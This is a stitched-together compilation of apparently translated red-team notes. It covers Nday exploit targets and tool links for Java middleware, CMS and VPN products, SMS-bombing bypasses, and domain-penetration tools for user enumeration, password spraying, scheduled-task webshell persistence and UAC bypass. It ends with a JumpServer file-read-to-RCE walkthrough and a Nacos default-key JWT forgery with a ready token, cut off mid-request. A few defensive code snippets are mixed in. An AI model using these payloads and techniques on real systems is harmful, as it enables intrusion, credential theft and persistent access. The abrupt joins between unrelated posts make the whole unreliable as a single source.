Since it is entirely guided by practical use, I only selected the 'middleware', 'open source programs' and 'web components' that are relatively common and can effectively help get a shell in practice.
Known Nday exploits for various Java middleware
Unlike other script-type web programs, Java usually runs with relatively high permissions, most often directly as root/administrator/system, so the shell permissions obtained are generally very high and usually amount to server permissions. In red team scenarios in particular, intruders generally choose these points first and use them as the breakthrough to obtain a stable springboard entry. Which industries especially like to use which middleware should also be analyzed and summarized in advance.
Struts2
Struts2-005 Struts2-008 Struts2-009 Struts2-013 Struts2-016 (in fact many old systems have missed this hole, and the success rate is high) Struts2-019 Struts2-020 Struts2-devmode Struts2-032 Struts2-033 Struts2-037 Struts2-045 Struts2-046 Struts2-048 Struts2-052 Struts2-053 Struts2-057
Exploitation tool: https://github.com/HatBoy/Struts2-Scan
weblogic
CVE-2019-2725 CVE-2019-2729 CVE-2018-3191 CVE-2018-2628 CVE-2018-2893 CVE-2018-2894 CVE-2017-3506 CVE-2017-10271 CVE-2017-3248 CVE-2016-0638 CVE-2016-3510 CVE-2015-4852 CVE-2014-4210 SSRF
Weak console password, deploy webshell
Tools for checking and exploitation:
https://github.com/0xn0ne/weblogicScanner (checking)
https://github.com/zhzyker/expub/tree/master/weblogic (exploitation)
Jboss
CVE-2015-7501 CVE-2017-7504 CVE-2017-12149
Unauthorized access, deploy webshell
Weak console password, deploy webshell
Exploitation tools:
https://github.com/joaomatosf/jexboss
https://github.com/joaomatosf/JavaDeserH2HC
wildfly [jboss 7.x was renamed wildfly]
Weak console password, deploy webshell
Tomcat
CVE-2016-8735
CVE-2017-12615 [depends on the readonly setting, which is seldom changed, so it is a little useless]
CVE-2020-1938 [AJP protocol vulnerability; not many people expose port 8009 directly to the external network, so it is a bit useless]
Weak console password, deploy webshell [Note: from version 7.x an anti-brute-force mechanism is enabled by default]
Vulnerability exploitation summary:
https://blog.csdn.net/weixin_42918771/article/details/104844367
https://mp.weixin.qq.com/s/ZXoCJ9GhMaTvVFeYn8vMUA
https://saucer-man.com/information_security/507.html#cl-11
Jenkins
CVE-2018-1999002 [arbitrary file read]
Unauthorized access, arbitrary command execution
Weak console password, arbitrary command execution
Vulnerability exploitation summary:
https://www.cnblogs.com/junsec/p/11593556.html
https://misakikata.github.io/2020/03/Jenkins%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88%E5%A4%8D%E7%8E%B0/
https://github.com/gquere/pwn_jenkins
ElasticSearch
CVE-2014-3120 [RCE, specifically for old versions (no sandbox)]
CVE-2015-1427 [Groovy RCE]
CVE-2015-3337 [arbitrary file read]
Unauthorized access, sensitive information leaked
Vulnerability summary:
https://jishuin.proginn.com/p/763bfbd3aa0d
https://mp.weixin.qq.com/s?__biz=MzAwMjgwMTU1Mg==&mid=2247484799&idx=2&sn=b91f5bc7a31f5786a66f39599ea44bff
https://blog.csdn.net/u011066706/article/details/51175761
https://www.cnblogs.com/AtesetEnginner/p/12060537.html
RabbitMQ
Weak password; the default account/password is guest/guest (default ports: 15672, 25672, 15692)
Glassfish
Arbitrary file read [low versions]
Weak console password, deploy webshell
Vulnerability exploitation: http://ip:port/theme/META-INF/%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./xxxpath/xxxfile
https://www.lxhsec.com/2019/03/04/middleware/
IBM Websphere
Java deserialization
Weak console password, deploy webshell
Vulnerability exploitation:
https://www.lxhsec.com/2019/03/04/middleware/
https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/WebSphere/CVE-2020-4643%20IBM%20WebSphere%E5%AD%98%E5%9C%A8XXE%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/
https://github.com/Ares-X/VulWiki
https://xz.aliyun.com/t/8248
Axis2
Arbitrary file read, directory traversal
Vulnerability exploitation:
https://xz.aliyun.com/t/6196
https://paper.seebug.org/1489/#23-axis2
https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Apache%20Axis/%EF%BC%88CVE-2019-0227%EF%BC%89Apache%20Axis%201.4%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/
https://github.com/CaledoniaProject/AxisInvoker
https://github.com/Fnzer0/Axis-RCE
https://paper.seebug.org/1489/
Apache ActiveMQ
Unauthorized access; the fileserver before 5.12 allows arbitrary PUT writes, CVE-2015-5254
Vulnerability exploitation:
http://wiki.sentrylab.cn/0day/ActiveMQ/3.html
https://www.freebuf.com/column/161188.html
https://www.taodudu.cc/news/show-2345492.html
Apache Solr
CVE-2017-12629
CVE-2019-0193 [Apache Solr 5.x - 8.2.0]
Exploitation:
https://xz.aliyun.com/search?keyword=Solr
https://www.jianshu.com/p/43e7f13e2058
https://caiqiqi.github.io/2019/11/03/Apache-Solr%E6%BC%8F%E6%B4%9E%E5%90%88%E9%9B%86/
https://cloud.tencent.com/developer/article/1810723
http://wiki.peiqi.tech/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Apache/Apache%20Solr/?h=Apache%20Solr
Apache Zookeeper
Unauthorized access, sensitive information leaked
Apache Shiro
Deserialization
fastjson <= 1.2.47
Deserialization exploitation
Various Windows php integrated environments [because the Webshell permissions obtained in such environments are relatively high, they are usually the first choice of red team personnel]
AppServ, Xampp, pagoda, PhpStudy
Known Nday vulnerability exploits for various open source programs
Dedecms: background weak password, series of known Nday vulnerability exploits
thinkphp 5.x: background weak password, series of known Nday vulnerability exploits
phpcms: background weak password, series of known Nday vulnerability exploits
ecshop: background weak password, series of known Nday vulnerability exploits
Metinfo: background weak password, series of known Nday vulnerability exploits
Discuz: background weak password, series of known Nday vulnerability exploits
Empire cms: background weak password, series of known Nday vulnerability exploits
phpmyadmin: database weak password, series of known Nday vulnerability exploits
Wordpress: background weak password, series of known Nday vulnerability exploits
Joomla: background weak password, series of known Nday vulnerability exploits
drupal: CVE-2018-7600, weak backend password, series of known Nday vulnerability exploits
Known Nday exploits for various other web components
IIS 6.0: RCE, short file name vulnerability, arbitrary PUT write, Webdav RCE CVE-2017-7269
Zentao (Zendao) project management system: SQL injection, file read, remote execution
Tongda OA: SQL injection, arbitrary upload
Exchange: enumerate mailbox usernames through its interfaces; weak password brute-forcing against each interface; CVE-2020-0688 [prerequisite: you must first hold the credentials of any email user]
Zimbra [XXE + SSRF = RCE]: CVE-2013-7091 CVE-2016-9924 CVE-2019-9670
Citrix: CVE-2019-19781
Jumpserver: authentication bypass
Zabbix: CVE-2017-2824; SQL injection [2.0 old version]; weak console password; sensitive machine information leaks
Cacti: SQL injection in some versions; weak console password
Nagios: CVE-2016-9565; weak console password
Webmin: RCE CVE-2019-15107
PHPMailer: CVE-2016-10033
Fanwei OA: remote code execution
Kingdee OA: SQL injection
Coremail: sensitive file leak
UEditor: arbitrary file upload
OpenSSL Heartbleed: grab plaintext account passwords
Shellshock vulnerability
Various regular basic web vulnerabilities that can quickly get a shell [Note: some of them are actually difficult to detect effectively and blindly without reviewing the code]
Weak background password
SSRF
SQL injection
Broken access control (overreach of authority)
Command / code execution / deserialization
Arbitrary file upload / download / read
File include
XSS (in fact XSS is only valuable when it targets certain specific mailboxes and you have a browser 0day in hand; it is not very fatal in the red team scenario)
Business logic vulnerabilities
Various border network devices: mainly weak web management console passwords and various known Nday attacks
Pulse Secure VPN: CVE-2019-11510 [arbitrary file read]
Fortinet VPN: CVE-2018-13379 [file read]
Sangfor VPN: RCE
0x03 Access to entry permissions [getshell exploitation of various basic service ports, defense focus ("top priority")]
Here only the services that can really help get a shell in practice are selected; other relatively marginal services are not mentioned. As before, the detailed sorting uses the 'difficulty of actual attack exploitation' and 'the shell permissions obtained' as the criteria. A brief description of the specific attack methods for each port is given below.
Top Port List
Mssql [default tcp port 1433: weak password, sensitive account password leakage, privilege escalation, remote execution, backdoor implantation]
SMB [default tcp port 445: weak password, remote execution, backdoor implantation]
WMI [default tcp port 135: weak password, remote execution, backdoor implantation]
WinRM [default tcp port 5985, mainly on newer versions of Windows: weak password, remote execution, backdoor implantation]
RDP [default tcp port 3389: weak password, remote execution, shift-key backdoors left by others]
SSH [default tcp port 22: weak password, remote execution, backdoor implantation]
ORACLE [default tcp port 1521: weak password, sensitive account password leakage, privilege escalation, remote execution, backdoor implantation]
Mysql [default tcp port 3306: weak password, sensitive account password leakage, privilege escalation (only applicable to some old systems)]
REDIS [default tcp port 6379: weak password, unauthorized access, file write (webshell, startup items, scheduled tasks), privilege escalation]
POSTGRESQL [default tcp port 5432: weak password, sensitive information leakage]
LDAP [default tcp port 389: unauthorized access, weak password, sensitive account password leakage]
SMTP [by default: username enumeration vulnerability, weak password, sensitive information leakage caused by service misconfiguration]
POP3 [default tcp port 110: weak password, sensitive information leakage]
IMAP [default tcp port 143: weak password, sensitive information leakage]
Exchange [default tcp port 443: weak password brute-forcing, e.g. Owa, ews, oab, AutoDiscover; pth off-mail; sensitive information leak]
VNC [default tcp port 5900: weak password]
FTP [default tcp port 21: weak password, anonymous access / writable, sensitive information leakage]
Rsync [default tcp port 873: unauthorized access, weak password, sensitive information leakage]
Mongodb [default tcp port 27017: unauthorized access, weak password]
TELNET [default tcp port 23: weak password, backdoor implantation]
SVN [default tcp port 3690: weak password, sensitive information leakage
-
Title: Various methods and techniques for bypassing SMS bombing vulnerabilities
When testing Party A's business or digging for SRC and other services, we often run into places where an SMS verification code is sent. What comes to mind are logical vulnerabilities such as arbitrary user login, SMS bombing, and arbitrary user password reset. Even simple vulnerabilities need clear analysis. Here are a few SMS bombing bypass cases to share, grouped by high and low risk.
1. Parameter pollution bypass
Parameter pollution: when the backend sends the text message it extracts the number part of the parameter. Mixing other characters into the number bypasses the check on whether that mobile number has already been sent to.
2. Variable pollution bypass
So-called variable pollution: the backend checks the content of the first variable and treats it as the value, but when the packet is passed on to the backend, if several parameters have the same name, the second, third, fourth or last one is taken as the value, so the backend's limit is bypassed.
3. Data length bypass
A mobile phone number is defined as 11 digits, but the backend does not check the length of the submitted number, so 123 = 0123 = 00123. This method bypasses the limit on a single mobile number: [A vulnerability of the dog] [The picture cannot be found]
4. Variable parameter bypass
This is common. When sending the verification code, the front end carries a state. By modifying this state the system's restrictions can be bypassed. For example, registered users cannot send text messages, or conversely unregistered users cannot send text messages; false is changed to true.
5. Cookie replacement bypass
The same thing in a different guise. The user's credentials are verified from the cookie; by modifying some parameters in the cookie you can bypass the restriction on sending to already-sent / already-registered mobile numbers.
6. [Space bypass SMS bombing] [No picture]
When sending SMS the number is 11 digits, but the database field length is not limited to 11. Adding spaces bypasses the original check; when the backend sends the message it takes only the valid characters at the front of the field, so the limit is bypassed.
7. [Verification code can be reused, leading to SMS bombing] [No picture]
After a username or password brute-force vulnerability is found, verification of a verification code is added, but the verification code is not released when it is sent and does not become invalid, which causes the SMS bombing vulnerability.
8. [Based on an API interface] [No picture]
For this vulnerability, generally: the mobile number is entered in the front end and a request is sent. 1. The backend determines whether the send request can be executed. 2. If not, it returns False or an error; if successful, it returns true or success. Just look for the returned value. This kind of vulnerability may be found on an interface.
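A server-side guard for the send-code endpoint that closes each of the bypasses listed above (cases 1 to 7), written as an added example rather than code from the original post; the limits, the phone-number format and the 13800138000 sample number are constructed for illustration.

```python
"""Server-side guard for a 'send SMS code' endpoint. Added example, not from
the original post; SEND_LIMIT / WINDOW_SECONDS / CODE_TTL_SECONDS are
constructed values and PHONE_RE assumes the 11-digit mainland mobile format."""
import re
import secrets
from collections import defaultdict
from urllib.parse import parse_qs

PHONE_RE = re.compile(r"1\d{10}")   # exactly 11 digits, nothing else
SEND_LIMIT = 3                      # codes per number per window
WINDOW_SECONDS = 600
CODE_TTL_SECONDS = 300


class SmsGuard:
    def __init__(self):
        self._sends = defaultdict(list)   # canonical number -> send timestamps
        self._codes = {}                  # canonical number -> (code, expiry)

    @staticmethod
    def phone_from_query(query: str):
        """Reject a missing or repeated 'phone' parameter (case 2: the last
        duplicate must never silently win) and any value that is not exactly
        11 digits: leading zeros (case 3), spaces (case 6) and extra characters
        (case 1) all fail PHONE_RE, so the validated value is the rate-limit key
        and nothing is 'extracted' from it later."""
        values = parse_qs(query, keep_blank_values=True).get("phone", [])
        if len(values) != 1:
            return None, ("duplicate_param" if values else "missing_param")
        if not PHONE_RE.fullmatch(values[0]):
            return None, "bad_number"
        return values[0], None

    def request_code(self, query: str, now: float) -> str:
        """Any 'state' / 'registered' field or cookie flag sent by the client is
        ignored (cases 4 and 5): eligibility and the counter live server-side."""
        phone, err = self.phone_from_query(query)
        if err:
            return err
        recent = [t for t in self._sends[phone] if now - t < WINDOW_SECONDS]
        self._sends[phone] = recent
        if len(recent) >= SEND_LIMIT:
            return "rate_limited"
        recent.append(now)
        code = f"{secrets.randbelow(10**6):06d}"
        self._codes[phone] = (code, now + CODE_TTL_SECONDS)  # replaces older code
        return "sent"

    def verify_code(self, phone: str, code: str, now: float) -> bool:
        """Single use (case 7): the stored code is consumed on the first attempt
        and is worthless after CODE_TTL_SECONDS."""
        entry = self._codes.pop(phone, None)
        if entry is None:
            return False
        stored, expiry = entry
        return now < expiry and secrets.compare_digest(stored, code)

    def peek_code(self, phone: str) -> str:
        """Test hook only; a real service never exposes the code."""
        return self._codes[phone][0]
```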
-
Title: Domain Penetration Widget Sharing
0x01. NetLocalGroupGetMembers
Function: query the members of the target server's local Administrators group
0x02. NetLocalGroupEnum
Function: return all local groups on the specified server
0x03. NetGroupGetUsers
Function: return all members of the specified group on the specified server. To query the members of each group in the domain, the IP must be a domain controller IP
0x04. NetUserEnum
Function: query all users of the target server, including hidden users
0x05. WNetAddConnection2A
Function: establish an IPC connection; can map the target's shared directory to a local drive
0x06. WNetCancelConnection2
Function: delete an IPC connection
0x07. EnuDomainUser
Function: enumerate domain users
1. Introduction
Applicable to: the current foothold machine is a workgroup machine. Through tools such as nltest or nbtscan it is discovered that the intranet has a domain environment and the domain controller IP is found, but no domain user's credentials are at hand.
Prerequisite: able to establish a null session with the domain controller.
Implementation principle: a domain has an Administrator user by default. The SID of the domain Administrator is looked up through the Windows API, then the SID range is iterated and domain members (domain users and domain machines) are enumerated.
SID range: the SIDs of domain users and domain machines are generally above 1000, so traverse SIDs above 1000 when using the tool.
2. Tool usage
Help:
C:\Users\Administrator\Desktop>EnuDomainUser.exe
Usage: EnuDomainUser.exe DC-IP domainname\username start Sid end Sid t_num
EnuDomainUser.exe \\192.168.52.2 hack\administrator 1000 2000 100
EnuDomainUser.exe \\<domain controller IP> <domain name>\<domain user name, default administrator> <start SID> <end SID> <number of threads>
Demo: EnuDomainUser.exe 192.168.52.2 hack\administrator 1000 2000 100
Parameter explanation:
192.168.52.2 is the domain controller IP
hack is the domain name
administrator is the default domain admin user
1000 is the starting SID of the traversal
2000 is the ending SID of the traversal; you can set it a little higher, such as 10000, 20000, etc.
100 is the number of threads
0x08. BlastDomainUserPwd
Function: brute-force domain user passwords
1. Introduction
Connect via IPC and brute-force the domain user's password. Combine with the EnuDomainUser tool or the kerbrute tool to obtain the domain user name list, then brute-force. If 360 kills it, just rename the exe.
Design ideas: if a null session with the domain controller can be established, use EnuDomainUser to enumerate all domain user names; if it cannot, use kerbrute to brute-force domain user names. After obtaining a batch of domain user names, start trying weak domain user passwords. If the domain password policy has strength requirements, try strong-looking passwords, e.g. P@ssw0rd, 1qaz@WSX, etc.
2. Tool usage
Usage: BlastDomainUserPwd.exe domainComputerIp domainUser.txt password t_num
BlastDomainUserPwd.exe \\192.168.52.29 domainUser.txt password 100
BlastDomainUserPwd.exe \\<domain machine IP> <domain user name dictionary> <password to try> <number of threads>
Domain user name dictionary format: domain\user
Running example: BlastDomainUserPwd.exe \\192.168.52.2 domainUser.txt 1qaz@WSX 3
Successfully brute-forced domain user passwords are saved in success.txt in the current directory.
0x09. SchtaskBackDoorWebshell
Function: maintain a webshell through a scheduled task
1. Applicable scenario: the defender found the webshell in the protected network and cleared it, and the vulnerability was also fixed; when the website was restored the webshell could no longer be uploaded, so the webshell is rewritten through a scheduled task.
2. Conditions: administrator permissions, because creating scheduled tasks requires them
3. How to use: xxxx.exe c:\www\upload\1.jsp
4. Implementation: copy the content of c:\www\upload\1.jsp to c:\windows\temp\tempsh.txt, then create a scheduled task whose command is c:\windows\system32\cmd.exe /c copy c:\windows\temp\tempsh.txt c:\www\upload\1.jsp, triggered every half hour.
5. Video demonstration:
0x10. regeditBypassUAC
Function: execute an exe bypassing UAC. The compiled exe only works on win10, not win7.
1. Specific process: whitelisted program registry bypassUAC
2. Video demonstration
0x11. delegationVul
Function: detect constrained delegation inside the domain
1. Constrained delegation exploitation
2. Video demonstration
3. Resource-based constrained delegation exploitation
4. Video demonstration
0x12. 360SafeBrowserDecrypt
Function: run directly on the target machine, but it cannot evade 360 (360SafeBrowserDecrypt.exe); drag the target machine id and the assis2.db database back for local decryption.
Check machine id: reg query 'HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY' /v 'MachineGuid'
Check the 360 Safe Browser installation directory: reg query 'HKCR\360SeSES\DefaultIcon'
Default assis2.db database directory: C:\Users\
-
Title: jumpserver remote execution vulnerability analysis and reproduction
0 Introduction
JumpServer is an open source bastion host, an operations and maintenance security audit system that complies with the 4A specification; in layman's terms, a jump box. On January 15, 2021, JumpServer released a security update fixing a remote command execution vulnerability. Because some JumpServer interfaces have no authorization restrictions, an attacker can construct malicious requests to obtain sensitive information, or perform related operations to control all machines and execute arbitrary commands.
Affected versions: JumpServer < v2.6.2, JumpServer < v2.5.4, JumpServer < v2.4.5, JumpServer <= v1.5.9
1. Vulnerability analysis
See the commit record of the fix: https://github.com/jumpserver/jumpserver/commit/f04e2fa0905a7cd439d7f6118bc810894eed3f3e
It was found that identity authentication was added to the connect method of the CeleryLogWebsocket class.

```python
import time
import os
import threading
import json

from common.utils import get_logger
from .celery.utils import get_celery_task_log_path
from .ansible.utils import get_ansible_task_log_path
from channels.generic.websocket import JsonWebsocketConsumer

logger = get_logger(__name__)


class TaskLogWebsocket(JsonWebsocketConsumer):
    disconnected = False

    log_types = {
        'celery': get_celery_task_log_path,
        'ansible': get_ansible_task_log_path
    }

    def connect(self):
        # The fix: before the commit every client was accepted here, so the
        # log stream below was reachable without a session.
        user = self.scope['user']
        if user.is_authenticated and user.is_org_admin:
            self.accept()
        else:
            self.close()

    def get_log_path(self, task_id):
        func = self.log_types.get(self.log_type)
        if func:
            return func(task_id)

    def receive(self, text_data=None, bytes_data=None, **kwargs):
        # task_id comes straight from the client message and is not validated
        data = json.loads(text_data)
        task_id = data.get('task')
        self.log_type = data.get('type', 'celery')
        if task_id:
            self.handle_task(task_id)

    def wait_util_log_path_exist(self, task_id):
        log_path = self.get_log_path(task_id)
        while not self.disconnected:
            if not os.path.exists(log_path):
                self.send_json({'message': '.', 'task': task_id})
                time.sleep(0.5)
                continue
            self.send_json({'message': '\r\n'})
            try:
                logger.debug('Task log path: {}'.format(log_path))
                task_log_f = open(log_path, 'rb')
                return task_log_f
            except OSError:
                return None

    def read_log_file(self, task_id):
        task_log_f = self.wait_util_log_path_exist(task_id)
        if not task_log_f:
            logger.debug('Task log file is None: {}'.format(task_id))
            return

        # The file is streamed 4 KiB at a time until both end markers are seen
        task_end_mark = []
        while not self.disconnected:
            data = task_log_f.read(4096)
            if data:
                data = data.replace(b'\n', b'\r\n')
                self.send_json(
                    {'message': data.decode(errors='ignore'), 'task': task_id}
                )
                if data.find(b'succeeded in') != -1:
                    task_end_mark.append(1)
                if data.find(bytes(task_id, 'utf8')) != -1:
                    task_end_mark.append(1)
            elif len(task_end_mark) == 2:
                logger.debug('Task log end: {}'.format(task_id))
                break
            time.sleep(0.2)
        task_log_f.close()

    def handle_task(self, task_id):
        logger.info('Task id: {}'.format(task_id))
        thread = threading.Thread(target=self.read_log_file, args=(task_id,))
        thread.start()

    def disconnect(self, close_code):
        self.disconnected = True
        self.close()
```

Check out the http interface of this class:
Through this class we know that the access chain of the interface is: visit ws/ops/tasks/log/ -> receive() of TaskLogWebsocket -> handle_task() -> read_log_file() -> wait_util_log_path_exist() -> read_log_file() -> get_task_log_path() in app/ops/utls.py
task_id is parsed from the text_data we send, so it is controllable. With the following message we can read the log file /opt/jumpserver/logs/jumpserver.log:
Send to ws://10.10.10.10:8080/ws/ops/tasks/log/
{'task': '/opt/jumpserver/logs/jumpserver'}
This is the principle of the file read. Reading log files has the following restrictions: files can only be read by absolute path, and only files ending in .log are read.
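The fix the page shows is the authentication check in connect(); the example below, which is added here and is not JumpServer's code, shows the defence-in-depth a log-path helper should have had as well: a caller-supplied task id must be a UUID and must resolve inside the log directory, so an absolute id like the one in the message above can never reach /opt/jumpserver/logs. CELERY_LOG_DIR and the simplified join are assumptions standing in for the real helper.

```python
"""Safe resolution of a task id to a log path. Added example, not JumpServer
code; CELERY_LOG_DIR and the simplified join are stand-ins for the real helper."""
import os
import uuid

CELERY_LOG_DIR = "/opt/jumpserver/data/celery"   # assumed location


def vulnerable_log_path(task_id: str, log_dir: str = CELERY_LOG_DIR) -> str:
    """Pre-fix shape: the caller-controlled id is joined onto the log dir.
    os.path.join discards log_dir when a later component is absolute, so the
    id '/opt/jumpserver/logs/jumpserver' yields /opt/jumpserver/logs/jumpserver.log,
    exactly the read shown above (only '.log' files, only by absolute path)."""
    return os.path.join(log_dir, task_id + ".log")


def safe_log_path(task_id: str, log_dir: str = CELERY_LOG_DIR) -> str:
    """Two independent checks: the id must parse as a UUID (the form Celery
    issues), and the resolved path must stay inside log_dir even if the first
    check is ever relaxed."""
    try:
        canonical = str(uuid.UUID(str(task_id)))
    except ValueError:
        raise ValueError(f"task id is not a UUID: {task_id!r}") from None
    root = os.path.realpath(log_dir)
    path = os.path.realpath(os.path.join(root, canonical + ".log"))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("resolved log path escapes the log directory")
    return path


def rejects(task_id: str) -> bool:
    """True when safe_log_path refuses the id."""
    try:
        safe_log_path(task_id)
    except ValueError:
        return True
    return False
```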
The following analyzes how to achieve remote code execution. By reading /opt/jumpserver/logs/gunicorn.log you can, with luck, obtain the user id, the system user id and the asset id:
user id, asset id, system user id
These three values are only written to the log while a user is logging in to the web terminal, so they have to be taken from the log at that moment. With them, the /api/v1/authentication/connection-token/ interface (/apps/authentication/api/UserConnectionTokenApi) returns, for user_id, asset_id and system_user_id, a token that is valid for only 20 s. This token can be used to create a tty on the koko component:
https://github.com/jumpserver/koko/blob/master/pkg/httpd/webserver.go#342
https://github.com/jumpserver/koko/blob/4258b6a08d1d3563437ea2257ece05b22b093e15/pkg/httpd/webserver.go#L167
The specific code is as follows:
The complete RCE exploitation steps are summarized as:
The websocket connection can be established without authorization.
The log file can be read through the websocket to get the system user, user and asset fields in the log file.
Through those fields a 20-second token is obtained and used to enter the koko tty.
Execute commands.
2 Vulnerability reproduction
2.1 Environment setup
Local environment: xubuntu 20.04, jumpserver version 2.6.1
Installation steps:

```shell
# download
git clone https://github.com/jumpserver/installer.git
cd installer
# domestic docker source acceleration
export DOCKER_IMAGE_PREFIX=docker.mirrors.ustc.edu.cn
# install the dev version and then switch to 2.6.1 (you should be able to install 2.6.1 directly; at the beginning it was installed as the default dev version, but it doesn't matter)
sudo su
./jmsctl.sh install
./jmsctl.sh upgrade v2.6.1
# start up
./jmsctl.sh restart
```

Full log:
# yanq @ yanq-desk in ~/gitrepo [22:18:53] C:127
$ git clone https://github.com/jumpserver/installer.git
Cloning to 'installer'.
remote: Enumerating objects: 467, done.
remote: Total 467 (delta 0), reused 0 (delta 0), pack-reused 467
Receiving objects: 100% (467/467), 95.24 KiB | 182.00 KiB/s, done.
Resolving deltas: 100% (305/305), done.
# yanq @ yanq-desk in ~/gitrepo [22:20:27]
$ cd installer
# yanq @ yanq-desk in ~/gitrepo/installer on git:master o [22:20:30]
$ ls
compose  config-example.txt  config_init  jmsctl.sh  README.md  scripts  static.env  utils
# yanq @ yanq-desk in ~/gitrepo [22:18:59]
$ export DOCKER_IMAGE_PREFIX=docker.mirrors.ustc.edu.cn
# yanq @ yanq in ~/github/installer on git:master o [22:03:43] C:130
$ sudo su
root@yanq:/home/yanq/github/installer# ./jmsctl.sh install
[JumpServer ASCII banner]
Version: dev
1. Configure JumpServer
1. Check the configuration file
Each component uses environment variable configuration files instead of yaml format, and the configuration names are consistent with before
Configuration file location: /opt/jumpserver/config/config.txt
Finish
2. Configure Nginx certificates
The certificate location is: /opt/jumpserver/config/nginx/cert
Finish
3. Back up configuration files
Backup to /opt/jumpserver/config/backup/config.txt.2021-01-17_22-03-52
Finish
4. Configure the network
Need to support IPv6? (y/n) (default is n): n
Finish
5. Automatically generate encryption keys
Finish
6. Configure the persistence directory
Modify the persistent directory for logs etc.: find the largest disk and create the directory, e.g. /opt/jumpserver
Note: it cannot be changed after installation, otherwise the database may be lost.
File System     Capacity  Used  Available  Used%  Mount Point
udev            7.3G      0     7.3G       0%     /dev
/dev/nvme0n1p2  468G      200G  245G       45%    /
/dev/loop1      56M       56M   0          100%   /snap/core18/1944
/dev/loop2      65M       65M   0          100%   /snap/gtk-common-themes/1513
/dev/loop3      218M      218M  0          100%   /snap/gnome-3-34-1804/60
/dev/loop0      56M       56M   0          100%   /snap/core18/1932
/dev/loop5      32M       32M   0          100%   /snap/snapd/10492
/dev/loop6      65M       65M   0          100%   /snap/gtk-common-themes/1514
/dev/loop4      52M       52M   0          100%   /snap/snap-store/498
/dev/loop7      52M       52M   0          100%   /snap/snap-store/518
/dev/loop8      219M      219M  0          100%   /snap/gnome-3-34-1804/66
/dev/loop9      32M       32M   0          100%   /snap/snapd/10707
/dev/nvme0n1p1  511M      7.8M  504M       2%     /boot/efi
Set the persistent volume storage directory (default is /opt/jumpserver):
Finish
7. Configure MySQL
Whether to use external mysql (y/n) (default is n): n
Finish
8. Configure Redis
Whether to use external redis (y/n) (default is n): n
Finish
2. Install and configure Docker
1. Install Docker
Start downloading the Docker program.
--2021-01-17 22:04:12-- https://mirrors.aliyun.com/docker-ce/linux/static/stable/x86_64/docker-18.06.2-ce.tgz
Resolving host mirrors.aliyun.com (mirrors.aliyun.com). 180.97.148.110, 101.89.125.248, 58.216.16.38,
Connecting mirrors.aliyun.com (mirrors.aliyun.com)|180.97.148.110|:443. Connected.
HTTP request has been issued, waiting for a response. 200 OK
Length: 43834194 (42M) [application/x-tar]
Saving to: "/tmp/docker.tar.gz"
/tmp/docker.tar.gz 100%[===================>]
2021-01-17 22:04:16 (13.8 MB/s) - Saved "/tmp/docker.tar.gz" [43834194/43834194]
Start downloading the Docker compose program.
--2021-01-17 22:04:17-- https://get.daocloud.io/docker/compose/releases/download/1.27.4/docker-compose-Linux-x86_64
Resolving the host get.daocloud.io (get.daocloud.io). 106.75.86.15
Connecting get.daocloud.io (get.daocloud.io)|106.75.86.15|:443. Connected.
HTTP request has been issued, waiting for a response. 302 FOUND
Location: https://dn-dao-github-mirror.daocloud.io/docker/compose/releases/download/1.27.4/docker-compose-Linux-x86_64 [Follow to new URL]
--2021-01-17 22:04:28-- https://dn-dao-github-mirror.daocloud.io/docker/compose/releases/download/1.27.4/docker-compose-Linux-x86_64
Resolving host dn-dao-github-mirror.daocloud.io (dn-dao-github-mirror.daocloud.io). 240e:ff:a024:200:33603fe, 240e:964:100:302:33603fe, 61.160.204.242,
Connecting dn-dao-github-mirror.daocloud.io (dn-dao-github-mirror.daocloud.io)|240e:ff:a024:200:3fe|:443. Connected.
HTTP request has been issued, waiting for a response. 200 OK
Length: 12218968 (12M) [application/x-executable]
Saving to: "/tmp/docker-compose"
/tmp/docker-compose
-
Title: Vulnerability summary and reproduction
Nacos vulnerability summary and reproduction

1. Nacos default key allows login bypass
A problem was found in Nacos <= 2.1.0: deployments that keep the default JWT key are exposed to an unauthorized-access vulnerability. Through it, an attacker can bypass username and password authentication and log in as the Nacos user directly.

0x00 Vulnerability Description
Affected versions: 0.1.0 <= Nacos <= 2.2.0

0x01 Vulnerability Impact
fofa: app="NACOS"

0x02 Vulnerability Search
In Nacos the token.secret.key value is hard-coded; it lives in application.properties under conf:
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

1. Obtain a token. Use this default key to construct a JWT and go straight into the backend. Construction method, on https://jwt.io/: enter the default key SecretKey012345678901234567890123456789012345678901234567890123456789, then enter in the payload:
{ "sub": "nacos", "exp": 1678899909 }
Note: 1678899909 is a Unix timestamp; when converted it must be later than the current time on your system. For example, the current time is March 15, 2023 22:11:09, and the timestamp here corresponds to March 16.

Notice: the following are the test results of forging JWT values to bypass permissions:
1. Extend the timestamp, POST a wrong password with the correct username.
2. Extend the timestamp, POST with both password and username wrong.
3. Delete the timestamp, POST with both password and username wrong.

Copy the value obtained above, select the login request in Burp and construct it. You need to add the token yourself in the box:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

POST /nacos/v1/auth/users/login HTTP/1.1
Host: 10.211.55.5:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://10.211.55.5:8848
Connection: close
Referer: http://10.211.55.5:8848/nacos/index.html
